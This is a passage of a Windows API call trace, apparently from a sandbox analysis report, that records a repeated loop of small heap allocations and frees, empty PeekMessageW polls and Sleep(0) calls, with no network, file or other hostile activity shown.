Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.976] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.976] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.976] Sleep (dwMilliseconds=0x0) [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.977] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.977] Sleep (dwMilliseconds=0x0) [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.977] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.977] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.978] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.978] Sleep (dwMilliseconds=0x0) [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.978] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.978] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.979] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.979] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.979] Sleep (dwMilliseconds=0x0) [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.979] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.979] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.980] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.980] Sleep (dwMilliseconds=0x0) [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.980] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.980] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.980] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.981] Sleep (dwMilliseconds=0x0) [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.981] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.981] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.981] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.981] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.982] Sleep (dwMilliseconds=0x0) [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.982] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.982] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.982] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.982] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.983] Sleep (dwMilliseconds=0x0) [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.983] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.983] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.983] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.983] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.984] Sleep (dwMilliseconds=0x0) [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.984] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.984] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.984] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.984] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.985] Sleep (dwMilliseconds=0x0) [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.985] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.985] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.985] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: 